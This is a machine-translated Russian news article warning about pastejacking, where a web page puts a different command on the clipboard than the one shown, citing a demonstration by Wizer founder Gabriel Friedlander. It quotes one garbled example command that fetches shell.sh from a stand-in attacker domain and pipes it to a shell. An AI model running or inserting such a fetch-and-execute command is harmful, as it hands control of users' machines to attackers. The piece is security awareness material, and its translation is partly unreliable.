Как копирование и вставка могут доставить вам больше проблем, чем вы думаете

How to effectively deal with bots on your site? The best protection against click fraud.
  • Мы все ежедневно копируем и вставляем данные из Интернета, даже не подозревая о рисках.
  • Эксперт по безопасности нашел время, чтобы показать всем худший вариант развития событий.
  • Вставка команд, полученных из Интернета, в ваш терминал - быстрый способ получить взлом
  • Команды, которые вы думали, что вставляете в свой терминал, на самом деле являются вредоносными кодами.
хакер

Это правда, что мы живем в эпоху, когда скорость - это все, а получение быстрых результатов - это все, что имеет значение. Однако мало кто на самом деле останавливается на секунду и думает о последствиях.

Ежедневно миллионы программистов, администраторов и исследователей безопасности выполняют простые задачи, такие как копирование и вставка команд с веб-страниц непосредственно в консоли на своих ПК.

Хотя многие даже не задумываются об этом, последствия гораздо серьезнее и опаснее, чем вы могли подумать вначале, особенно если вы храните конфиденциальные или ценные данные.

Известный эксперт по безопасности нашел время, чтобы поделиться что могло случиться на самом деле если вы копируете + вставляете контент с веб-страниц.

instagram story viewer

Копировать + Вставить - это простой способ получить взлом

Габриэль Фридландер, основатель платформы Wizer по обучению вопросам безопасности, раскрыл схему, которая заставит вас дважды подумать, прежде чем копировать и вставлять команды с веб-страниц.

Копирование и вставка контента из Интернета в наши дни стало настолько распространенным явлением, что никто даже не задумывается об этом.

Тем не менее, Фридлендер предупреждает, что некоторые веб-страницы более обманчивы, чем может показаться на первый взгляд, и то, что, по вашему мнению, вы скопировали, сильно отличается от того, что вы сделали на самом деле.

И хуже всего то, что без необходимых знаний или указаний жертвы осознают свою ошибку только после вставки текста, и в этот момент может быть уже слишком поздно.

Аналитик по безопасности также разработал небольшой тест для читателей своего блога, чтобы люди действительно могли понять, насколько легко вы неохотно открываете дверь для киберпреступников.

Он предоставил команду, которая должна быть скопирована, но относящаяся к делу истина раскрывается только тогда, когда вы вставляете текст и видите, что вы фактически внесли в свою настройку.

После копирования команды, показанной на скриншоте выше, результат вставки вас шокирует, так как это далеко не то, что вы думали дублировали.

завиток http://attacker-domain: 8000 / shell.sh | ш

Помимо совершенно другой команды, присутствующей в вашем буфере обмена, символ новой строки (или возврата) в конец означает, что приведенный выше пример будет выполнен, как только он будет вставлен непосредственно в Linux Терминал.

Так что вам лучше быть в курсе того, что происходит на самом деле, и относиться к этому как к серьезной угрозе безопасности. Мы не говорим, что все веб-сайты скрывают вредоносный контент, но стоит принять это во внимание.

Вас когда-нибудь взламывали, вставляя хитрые команды в свой терминал? Поделитесь с нами своим опытом в разделе комментариев ниже.

Teachs.ru
Защитите свой браузер и VPN от агента Тесла

Защитите свой браузер и VPN от агента ТеслаВредоносное ПОКибербезопасность

Агент Тесла это Троян удаленного доступа (RAT) вредоносное ПО, которое поставляется с кейлоггером. Как только он попадает в вашу систему, он начинается украсть твой реквизиты для входа с вашего уст...

Читать далее
Вредоносная программа "Ваша Windows запрещена" вернулась, вот что вам нужно знать

Вредоносная программа "Ваша Windows запрещена" вернулась, вот что вам нужно знатьВредоносное ПОКибербезопасность

Интернет предлагает изобилие информации, но в сети также таится много опасностей. Большинство пользователей хотя бы раз сталкивались с вредоносными программами, и, говоря об этом, похоже, что вредо...

Читать далее
5+ лучших программ для обнаружения вторжений [IDS Tools]

5+ лучших программ для обнаружения вторжений [IDS Tools]Вредоносное ПОКибербезопасность

Экономящий время опыт в области программного и аппаратного обеспечения, который помогает 200 миллионам пользователей в год. Предоставляет вам практические советы, новости и советы по улучшению ваше...

Читать далее
ig stories viewer